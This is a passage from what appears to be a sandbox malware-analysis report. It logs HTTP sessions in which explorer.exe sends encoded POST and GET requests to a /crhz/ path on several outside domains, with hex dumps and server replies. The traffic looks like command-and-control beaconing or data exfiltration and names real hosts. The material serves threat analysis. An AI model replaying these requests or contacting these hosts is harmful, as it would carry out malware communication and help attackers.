                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                22192.168.2.649741163.44.198.5080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:32.629285097 CET231OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.mitsubangsaen.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.mitsubangsaen.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.mitsubangsaen.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 71 6f 4f 35 43 64 43 61 35 49 73 4f 33 33 6d 64 59 63 42 6d 4b 44 4e 72 39 72 37 76 56 33 51 6e 4f 71 47 54 7a 6f 49 7a 48 68 54 77 55 6f 47 4c 37 69 33 44 4e 4a 45 76 59 4b 53 37 71 51 49 76 75 74 66 50 61 70 42 32 7e 55 4e 79 41 37 54 44 45 49 4a 4e 66 35 65 6c 6d 37 6e 32 6d 64 50 5a 50 2d 76 52 77 42 77 66 36 4f 6d 73 70 42 36 53 79 53 4f 32 28 66 69 6f 7a 65 58 37 32 41 75 65 30 35 56 53 7a 5f 56 63 66 44 52 59 4f 39 46 37 72 42 47 58 39 4a 31 55 7e 78 45 69 6e 62 46 32 6c 6b 42 34 30 6d 34 6c 39 39 6c 4a 6e 72 65 32 52 6d 30 5f 39 32 55 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=qoO5CdCa5IsO33mdYcBmKDNr9r7vV3QnOqGTzoIzHhTwUoGL7i3DNJEvYKS7qQIvutfPapB2~UNyA7TDEIJNf5elm7n2mdPZP-vRwBwf6OmspB6SySO2(fiozeX72Aue05VSz_VcfDRYO9F7rBGX9J1U~xEinbF2lkB40m4l99lJnre2Rm0_92U.
                                                                Jan 30, 2023 14:53:32.840301037 CET231INHTTP/1.1 404 Not Found
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:53:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                23192.168.2.649742163.44.198.5080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:35.352989912 CET234OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.mitsubangsaen.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.mitsubangsaen.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.mitsubangsaen.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 71 6f 4f 35 43 64 43 61 35 49 73 4f 32 55 7e 64 49 4c 56 6d 50 6a 4e 6f 79 4c 37 76 4f 6e 51 6a 4f 71 61 54 7a 70 38 64 48 53 28 77 55 35 57 4c 37 41 76 44 50 4a 45 76 51 71 53 33 6b 77 49 44 75 74 4c 44 61 74 45 42 7e 57 68 79 50 38 33 44 4d 75 39 4f 4b 5a 65 6e 78 72 6e 31 6d 64 50 32 50 39 48 64 77 42 38 35 36 49 4f 73 70 33 75 53 7a 69 4f 78 69 76 69 6f 7a 65 58 5f 32 41 76 50 30 35 64 61 7a 2d 64 4d 66 77 5a 59 4f 64 6c 37 34 6d 71 55 71 5a 31 59 30 52 46 76 72 72 6c 37 75 55 30 6e 32 48 55 54 74 39 39 68 6a 70 28 36 44 58 73 2d 6d 43 4b 55 48 71 71 45 77 55 6c 35 73 6a 73 5f 34 48 48 4b 42 35 46 51 77 71 36 76 30 57 55 4b 41 69 58 74 4f 6f 44 74 6c 6a 63 4f 57 51 74 77 71 37 5a 78 65 4f 49 7a 69 65 50 54 64 72 6c 34 4f 55 74 61 7e 69 6a 61 76 47 51 65 68 69 58 7a 30 55 51 58 35 6b 72 64 63 35 6d 2d 72 52 30 71 44 31 4b 36 7e 37 59 37 63 2d 52 32 51 67 32 46 72 4f 77 58 66 45 45 7a 30 63 4f 2d 52 38 44 2d 62 6e 70 43 71 6a 4e 4f 58 43 67 67 47 52 41 75 61 4c 72 4e 4a 31 37 76 54 4f 39 78 6e 2d 47 65 44 43 44 63 62 56 6c 34 31 67 6c 4e 75 43 4b 69 5a 6f 48 54 61 79 72 35 30 41 4e 42 52 72 56 51 42 2d 57 63 4a 50 75 37 56 4f 76 46 32 52 70 43 79 6e 56 65 57 72 4a 37 6d 6a 4f 70 4e 47 35 6b 39 78 4a 32 4e 5f 4c 36 4d 4e 4e 39 6e 39 61 38 58 4b 38 43 36 65 6e 51 31 4e 36 70 63 53 59 59 63 5a 35 67 44 39 77 75 34 75 67 4b 4d 48 7e 59 6b 35 70 4f 61 55 69 43 75 77 6a 77 51 46 58 62 7e 46 75 77 41 39 7a 49 47 4f 66 30 4b 55 6f 4c 5a 59 6c 6e 66 5f 47 49 44 75 6c 6e 32 6a 57 53 39 52 42 33 4b 6c 59 4b 66 70 75 31 64 58 43 37 4f 32 79 6f 36 67 46 67 5a 4e 78 4e 77 48 4e 72 4b 38 4d 52 47 74 4b 72 67 33 31 33 7e 65 50 6a 72 50 54 32 71 52 55 45 79 6e 75 6d 34 6a 61 74 4c 6e 47 47 54 4a 76 59 47 38 46 4c 52 6d 34 69 6b 6b 49 47 63 77 66 79 6d 64 32 5f 71 45 5a 39 77 36 51 31 48 66 77 57 64 58 61 31 4f 4f 6c 62 48 6c 38 6e 76 57 55 77 31 67 53 6f 43 63 35 41 64 33 37 4c 6f 6c 74 33 74 4f 79 54 53 69 34 70 56 4a 63 4d 68 79 45 32 33 39 62 37 64 6c 7e 6b 65 41 61 4f 75 5a 38 30 7a 79 56 53 6b 36 43 57 6b 6e 6c 79 76 6c 74 53 37 68 66 48 71 62 44 78 33 77 44 61 74 53 4a 54 31 72 6e 51 69 67 59 32 56 67 74 79 77 39 32 45 57 4d 50 75 79 4b 58 70 52 69 6d 76 45 59 48 6f 79 66 64 37 66 77 4e 61 66 39 68 56 6b 65 51 6d 59 34 6a 41 62 47 34 45 68 30 32 59 70 33 53 55 67 33 4c 73 61 51 35 62 4a 6e 50 56 4a 5a 79 6e 7e 37 47 6a 33 43 48 46 71 74 61 2d 66 6b 33 2d 67 52 6a 34 51 56 7a 36 61 39 4e 4a 49 37 6e 6f 38 4e 31 79 73 72 7a 77 61 2d 57 39 63 73 77 77 7e 30 5a 53 6c 34 37 37 32 4b 52 64 64 58 7e 53 59 4a 6d 4d 55 4f 37 65 7e 36 69 69 36 56 4b 61 52 51 59 48 52 74 54 43 64 37 38 77 36 53 49 64 36 4c 36 6f 30 49 45 66 73 57 48 46 4d 6d 53 79 32 49 6e 53 59 4e 36 62 67 64 55 37 7e 39 69 41 6b 36 7a 47 5a 4b 7e 66 6e 4c 32 45 62 4e 6e 57 6c 42 71 4a 79 45 65 50 65 41 53 30 44 36 48 48 36 5a 6b 57 62 6e 45 43 53 70 43 67 6b 6d 4f 59 78 7a 58 68 64 44 74 44 35 5f 58 63 44 37 55 5a 63 71 67 75 48 58 30 4d 47 56 51 61 6c 79 55 71 53 45 75 50 35 6e 6e 63 45 65 52 64 4b 59 4d 76 4f 38 7a 4e 46 77 28 72 30 69 4b 2d 75 43 35 47 36 30 74 43 77 6e 53 47 63 6c 63 36 64 4e 31 71 36 46 37 34 55 77 33 32 61 62 59 43 4e 4d 47 4b 70 68 67 36 78 59 70 6e 65 37 35 66 78 4f 45 5f 50 5a 45 45 4c 4f 62 71 75 32 38 6f 78 61 56 5a 54 4e 6d 50 50 4e 45 55 77 31 33 54 7a 77 73 7a 59 6e 54 38 67 7a 76 6a 76 75 6b 75 68 76 63 72 37 4c 39 79 7a 71 49 69 35 78 78 47 73 47 37 50 58 34 52 4e 69 6d 57 42 34 63 58 64 42 75 6e 4c 44 2d 7a 63 48 61 74 44 41 59 66 52 74 52 30 31 53 32 30 47 52 5a 35 65 43 38 50 4c 56 49 4a 70 4c 62 66 44 6c 4c 4a 55 4f 51 69 78 36 6b 51 46 49 70 77 62 59 34 28 37 33 58 30 5f 77 64 58 66 4c 30 63 51 73 31 57 70 41 32 4f 74 55 51 7a 38 4b 74 5a 41 4e 46 6a 45 49 57 69 54 63 56 36 72 68 78 45 69 4c 34 55 45 65 68 67 64 39 42 79 72 41 45 41 31 70 6d 7a 46 7a 76 46 4d 52 72 52 37 67 6e 4f 47 47 39 51 77 4e 55 6b 71 31 58 28 63 68 73 28 4f 78 70 30 70 36 4b 62 71 43 77 71 77 67 32 4f 6c 50 54 58 6a 68 6b 33 38 79 4e 69 43 39 76 39 45 28 52 47 74 72 34 38 53 5a 36 79 74 41 34 6e 77 44 64 66 51 77 50 68 70 62 68 58 68 77
                                                                Data Ascii: ghJ5T=qoO5CdCa5IsO2U~dILVmPjNoyL7vOnQjOqaTzp8dHS(wU5WL7AvDPJEvQqS3kwIDutLDatEB~WhyP83DMu9OKZenxrn1mdP2P9HdwB856IOsp3uSziOxiviozeX_2AvP05daz-dMfwZYOdl74mqUqZ1Y0RFvrrl7uU0n2HUTt99hjp(6DXs-mCKUHqqEwUl5sjs_4HHKB5FQwq6v0WUKAiXtOoDtljcOWQtwq7ZxeOIziePTdrl4OUta~ijavGQehiXz0UQX5krdc5m-rR0qD1K6~7Y7c-R2Qg2FrOwXfEEz0cO-R8D-bnpCqjNOXCggGRAuaLrNJ17vTO9xn-GeDCDcbVl41glNuCKiZoHTayr50ANBRrVQB-WcJPu7VOvF2RpCynVeWrJ7mjOpNG5k9xJ2N_L6MNN9n9a8XK8C6enQ1N6pcSYYcZ5gD9wu4ugKMH~Yk5pOaUiCuwjwQFXb~FuwA9zIGOf0KUoLZYlnf_GIDuln2jWS9RB3KlYKfpu1dXC7O2yo6gFgZNxNwHNrK8MRGtKrg313~ePjrPT2qRUEynum4jatLnGGTJvYG8FLRm4ikkIGcwfymd2_qEZ9w6Q1HfwWdXa1OOlbHl8nvWUw1gSoCc5Ad37Lolt3tOyTSi4pVJcMhyE239b7dl~keAaOuZ80zyVSk6CWknlyvltS7hfHqbDx3wDatSJT1rnQigY2Vgtyw92EWMPuyKXpRimvEYHoyfd7fwNaf9hVkeQmY4jAbG4Eh02Yp3SUg3LsaQ5bJnPVJZyn~7Gj3CHFqta-fk3-gRj4QVz6a9NJI7no8N1ysrzwa-W9csww~0ZSl4772KRddX~SYJmMUO7e~6ii6VKaRQYHRtTCd78w6SId6L6o0IEfsWHFMmSy2InSYN6bgdU7~9iAk6zGZK~fnL2EbNnWlBqJyEePeAS0D6HH6ZkWbnECSpCgkmOYxzXhdDtD5_XcD7UZcqguHX0MGVQalyUqSEuP5nncEeRdKYMvO8zNFw(r0iK-uC5G60tCwnSGclc6dN1q6F74Uw32abYCNMGKphg6xYpne75fxOE_PZEELObqu28oxaVZTNmPPNEUw13TzwszYnT8gzvjvukuhvcr7L9yzqIi5xxGsG7PX4RNimWB4cXdBunLD-zcHatDAYfRtR01S20GRZ5eC8PLVIJpLbfDlLJUOQix6kQFIpwbY4(73X0_wdXfL0cQs1WpA2OtUQz8KtZANFjEIWiTcV6rhxEiL4UEehgd9ByrAEA1pmzFzvFMRrR7gnOGG9QwNUkq1X(chs(Oxp0p6KbqCwqwg2OlPTXjhk38yNiC9v9E(RGtr48SZ6ytA4nwDdfQwPhpbhXhw6Uwo4EiUYBJuzihGccVkVX6LfQD94HAKxnSh6klmaPZhFe1H_JwCNGkiB~hRir-HZepv-13QxUiSZLfy-gUObae1qo.
                                                                Jan 30, 2023 14:53:35.555524111 CET234INHTTP/1.1 404 Not Found
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:53:35 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                24192.168.2.649743163.44.198.5080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:38.077323914 CET235OUTGET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL HTTP/1.1
                                                                Host: www.mitsubangsaen.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:38.284764051 CET235INHTTP/1.1 404 Not Found
                                                                Server: openresty
                                                                Date: Mon, 30 Jan 2023 13:53:38 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.649715185.151.199.5280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:20.571834087 CET104OUTGET /crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.n-r-eng.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:20.651880026 CET105INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://www.n-r-eng.com/crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.649719164.88.201.21480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:25.997982025 CET130OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.sandpiper-apts.com
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.sandpiper-apts.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.sandpiper-apts.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 39 78 6a 55 44 70 39 77 75 2d 41 68 71 75 68 6e 30 37 61 4f 37 64 41 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
                                                                Jan 30, 2023 14:52:26.207703114 CET130INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:26 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.649720164.88.201.21480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:28.798149109 CET133OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.sandpiper-apts.com
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.sandpiper-apts.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.sandpiper-apts.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 47 50 76 34 42 78 75 39 6b 78 61 45 6a 70 65 4b 71 71 54 72 4c 46 41 30 6d 79 4c 57 7e 7a 36 4a 42 30 6f 46 43 55 7a 76 50 56 53 57 67 6e 78 78 74 2d 71 62 69 35 33 30 4f 4a 62 4d 46 6e 69 70 71 5a 71 4e 54 33 74 50 51 57 4d 2d 32 30 36 54 4a 44 58 32 58 69 49 64 68 45 75 6d 4a 4d 63 53 72 5a 30 32 68 32 6d 35 6d 58 4e 69 5a 69 72 76 43 34 67 54 6d 45 55 54 28 48 71 4f 52 6b 6f 39 50 4e 66 4f 6c 50 54 55 70 31 6a 6c 33 6c 41 32 74 36 4b 74 4a 36 39 30 63 6b 58 7a 61 5f 4f 42 6c 42 76 51 56 35 4a 31 7e 4e 30 7a 6d 66 4d 35 6f 71 53 4a 28 59 59 6f 5a 50 75 54 46 70 66 43 77 75 67 62 43 34 70 6c 42 59 39 57 54 69 6a 6e 31 75 4b 53 64 52 47 75 55 77 54 6d 59 76 66 65 44 5f 4a 59 33 4b 51 5a 4a 33 66 4e 43 6d 75 2d 6a 59 4b 43 66 2d 52 78 52 36 53 50 64 4a 34 55 45 34 47 6a 53 30 62 68 63 58 41 6a 54 46 47 57 53 67 4a 4f 4b 76 50 36 41 50 41 59 4e 2d 57 6f 78 4d 79 69 61 74 4e 76 56 42 58 62 49 6f 72 5a 75 68 77 44 56 30 7a 4a 71 54 35 69 69 45 35 66 6d 33 6c 6f 33 49 7a 4e 50 41 32 6d 68 32 67 70 4a 69 43 65 31 4e 41 49 74 59 47 62 47 42 56 38 75 2d 53 69 57 6e 51 4f 33 79 54 6c 46 79 72 51 7a 57 61 48 67 45 6c 5a 6e 42 4c 79 69 78 46 4a 42 69 34 78 31 41 36 72 51 55 63 6a 46 7a 70 62 39 42 51 4c 44 70 57 6e 47 47 36 2d 79 4d 69 7a 64 36 70 6f 50 64 78 59 51 67 6a 44 43 63 68 39 42 6e 32 70 59 44 59 6e 28 6d 34 6c 76 39 37 74 61 5f 36 66 42 39 75 55 31 6e 73 4d 72 39 38 42 4d 44 47 69 6b 72 47 35 7a 38 38 64 6c 5a 34 48 76 75 64 44 4a 53 37 36 70 37 79 62 52 52 71 44 44 76 4d 59 58 71 32 5f 67 73 55 59 57 33 63 67 33 71 49 70 62 65 65 58 64 42 65 44 28 54 45 73 35 6f 4c 4a 75 7a 47 68 5a 74 49 70 71 67 49 4f 49 77 34 64 42 30 64 50 76 41 32 30 6c 44 55 62 4f 32 45 77 67 56 66 6a 61 71 33 4a 68 45 44 57 36 55 76 2d 6c 33 65 50 71 6e 4b 73 38 6e 47 66 55 78 78 74 4e 46 4b 70 38 34 77 69 73 36 6d 74 4b 63 49 46 58 31 58 46 4d 46 28 6c 78 47 28 54 57 6a 38 35 6b 30 53 51 56 4d 68 4e 42 66 58 37 77 57 45 68 6f 64 48 67 68 4c 6b 42 33 52 7a 65 55 5f 56 36 36 43 55 73 54 61 69 2d 33 5f 59 48 6c 73 59 72 4d 55 57 31 54 71 70 6e 33 46 6d 70 6c 50 30 4d 53 68 30 73 55 4d 68 51 72 70 71 75 61 6e 55 30 74 44 62 59 7e 65 4a 79 54 46 6c 6e 33 75 31 33 4b 4f 52 79 65 7a 4a 42 73 44 4c 63 70 38 47 67 61 70 68 5f 5a 30 4f 71 61 67 38 46 6d 6e 58 57 54 4c 48 4f 39 32 44 36 61 47 49 65 56 70 75 67 7e 78 78 36 46 69 4f 7a 68 44 70 5a 73 56 33 4f 52 31 7a 58 64 65 7e 4f 67 72 34 69 58 61 71 63 28 4c 56 59 37 76 71 5f 53 35 50 44 6e 36 79 5f 51 52 32 63 34 73 59 55 4a 48 28 6a 4c 53 79 31 78 5a 6f 34 36 77 6b 43 6f 37 38 34 4b 63 7a 75 6c 65 6d 59 5a 38 4d 6c 36 46 37 41 39 66 70 78 7a 57 48 79 59 4b 66 73 47 58 46 66 32 33 43 52 67 6e 77 46 35 41 42 49 72 4a 31 41 7a 7a 33 46 63 59 65 70 6f 62 6a 58 44 57 59 53 7a 4a 39 72 70 66 31 34 66 69 32 45 73 79 43 54 7e 6d 70 65 53 38 37 53 4e 7a 44 34 57 47 30 44 71 6c 56 43 32 79 68 42 42 35 77 75 55 47 7e 73 66 38 58 35 6b 4a 34 5a 4f 2d 4a 38 61 4c 57 4e 54 64 74 55 76 42 46 44 70 5a 58 6f 77 5a 41 76 68 50 72 77 33 69 79 73 56 36 72 48 69 70 58 41 39 74 4e 4b 4f 63 43 4a 75 4a 58 44 76 41 51 72 4e 4c 53 7a 61 37 70 72 65 57 70 6e 48 48 7e 7a 6d 46 4a 66 71 33 4b 44 49 50 5a 6d 30 6a 65 30 68 49 72 50 4a 53 64 38 78 2d 76 41 6a 32 50 52 6c 6d 47 78 51 30 63 46 67 35 37 4f 34 39 6c 74 63 43 36 79 62 31 58 51 54 47 57 51 54 52 6e 77 6d 59 67 77 72 70 52 78 66 68 44 57 59 62 65 2d 38 58 65 51 41 45 75 47 41 36 4f 70 43 48 47 5f 4a 36 6c 46 53 64 45 41 28 50 7e 38 4b 79 58 43 44 45 53 4b 31 34 53 55 35 78 70 6e 45 38 71 44 74 38 7e 68 4e 6e 48 52 5a 51 31 69 6d 4d 6c 59 4e 56 28 54 42 68 44 43 51 33 6e 5f 68 77 34 61 4b 35 31 43 65 4f 78 72 54 53 70 69 32 41 75 64 58 66 6d 35 38 49 70 6e 36 56 68 6e 4d 64 6a 77 73 67 56 46 55 39 6b 51 76 47 75 6b 70 67 38 33 64 74 37 47 69 5a 34 6c 39 57 4d 42 43 77 79 65 66 4a 75 43 41 62 79 59 70 55 30 54 52 46 56 56 66 34 70 58 34 4f 69 68 57 75 70 5a 62 42 53 36 66 5f 38 34 46 4a 34 33 6c 6a 51 63 62 6e 47 39 39 38 28 62 4f 4c 31 2d 34 34 74 61 65 64 48 42 37 57 7e 35 6b 42 42 54 70 59 6f 69 32 53 54 39 5a 58 7e 65 64 4b 55 68 6e 75 50 43 43
